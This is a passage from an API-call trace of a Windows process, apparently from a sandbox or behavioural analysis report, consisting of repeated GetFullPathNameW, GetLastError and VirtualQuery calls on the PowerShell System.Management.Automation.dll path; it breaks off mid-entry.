GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.194] GetLastError () returned 0x0 [0152.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.194] GetLastError () returned 0x0 [0152.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.194] GetLastError () returned 0x0 [0152.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.194] GetLastError () returned 0x0 [0152.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.194] GetLastError () returned 0x0 [0152.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.194] GetLastError () returned 0x0 [0152.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.194] GetLastError () returned 0x0 [0152.194] VirtualQuery (in: lpAddress=0x12cfc4, lpBuffer=0x12dfc4, dwLength=0x1c | out: lpBuffer=0x12dfc4*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12db50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.195] GetLastError () returned 0x0 [0152.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.195] GetLastError () returned 0x0 [0152.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.195] GetLastError () returned 0x0 [0152.195] VirtualQuery (in: lpAddress=0x12cfc4, lpBuffer=0x12dfc4, dwLength=0x1c | out: lpBuffer=0x12dfc4*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.195] VirtualQuery (in: lpAddress=0x12d000, lpBuffer=0x12e000, dwLength=0x1c | out: lpBuffer=0x12e000*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d9b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.195] GetLastError () returned 0x0 [0152.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d968, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.195] GetLastError () returned 0x0 [0152.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d968, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.195] GetLastError () returned 0x0 [0152.195] VirtualQuery (in: lpAddress=0x12cfc4, lpBuffer=0x12dfc4, dwLength=0x1c | out: lpBuffer=0x12dfc4*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.196] VirtualQuery (in: lpAddress=0x12d000, lpBuffer=0x12e000, dwLength=0x1c | out: lpBuffer=0x12e000*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d9b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.196] GetLastError () returned 0x0 [0152.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d968, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.196] GetLastError () returned 0x0 [0152.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d968, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.196] GetLastError () returned 0x0 [0152.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12db50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.196] GetLastError () returned 0x0 [0152.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.196] GetLastError () returned 0x0 [0152.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.196] GetLastError () returned 0x0 [0152.196] VirtualQuery (in: lpAddress=0x12cfc4, lpBuffer=0x12dfc4, dwLength=0x1c | out: lpBuffer=0x12dfc4*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.197] VirtualQuery (in: lpAddress=0x12d000, lpBuffer=0x12e000, dwLength=0x1c | out: lpBuffer=0x12e000*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d9b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.197] GetLastError () returned 0x0 [0152.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d968, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.197] GetLastError () returned 0x0 [0152.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d968, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.197] GetLastError () returned 0x0 [0152.197] VirtualQuery (in: lpAddress=0x12cfc4, lpBuffer=0x12dfc4, dwLength=0x1c | out: lpBuffer=0x12dfc4*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.198] VirtualQuery (in: lpAddress=0x12d000, lpBuffer=0x12e000, dwLength=0x1c | out: lpBuffer=0x12e000*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12db50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.198] GetLastError () returned 0x0 [0152.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.198] GetLastError () returned 0x0 [0152.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.198] GetLastError () returned 0x0 [0152.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12db50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.198] GetLastError () returned 0x0 [0152.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.198] GetLastError () returned 0x0 [0152.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.198] GetLastError () returned 0x0 [0152.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12db50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.198] GetLastError () returned 0x0 [0152.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.198] GetLastError () returned 0x0 [0152.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.198] GetLastError () returned 0x0 [0152.199] VirtualQuery (in: lpAddress=0x12cfc4, lpBuffer=0x12dfc4, dwLength=0x1c | out: lpBuffer=0x12dfc4*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.199] VirtualQuery (in: lpAddress=0x12d000, lpBuffer=0x12e000, dwLength=0x1c | out: lpBuffer=0x12e000*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d9b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.199] GetLastError () returned 0x0 [0152.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d968, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.199] GetLastError () returned 0x0 [0152.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d968, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.199] GetLastError () returned 0x0 [0152.199] VirtualQuery (in: lpAddress=0x12cfc4, lpBuffer=0x12dfc4, dwLength=0x1c | out: lpBuffer=0x12dfc4*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.199] VirtualQuery (in: lpAddress=0x12d000, lpBuffer=0x12e000, dwLength=0x1c | out: lpBuffer=0x12e000*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d9b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.199] GetLastError () returned 0x0 [0152.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d968, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.199] GetLastError () returned 0x0 [0152.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d968, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.200] GetLastError () returned 0x0 [0152.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.200] GetLastError () returned 0x0 [0152.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ded0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.200] GetLastError () returned 0x0 [0152.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ded0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.200] GetLastError () returned 0x0 [0152.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12de80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.200] GetLastError () returned 0x0 [0152.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12de30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.200] GetLastError () returned 0x0 [0152.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12de30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.200] GetLastError () returned 0x0 [0152.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.200] GetLastError () returned 0x0 [0152.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.200] GetLastError () returned 0x0 [0152.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.200] GetLastError () returned 0x0 [0152.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.200] GetLastError () returned 0x0 [0152.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.201] GetLastError () returned 0x0 [0152.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.201] GetLastError () returned 0x0 [0152.201] VirtualQuery (in: lpAddress=0x12d434, lpBuffer=0x12e434, dwLength=0x1c | out: lpBuffer=0x12e434*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12de28, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.201] GetLastError () returned 0x0 [0152.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ddd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.201] GetLastError () returned 0x0 [0152.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ddd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.201] GetLastError () returned 0x0 [0152.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.201] GetLastError () returned 0x0 [0152.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.201] GetLastError () returned 0x0 [0152.201] GetFullPathNameW (in: 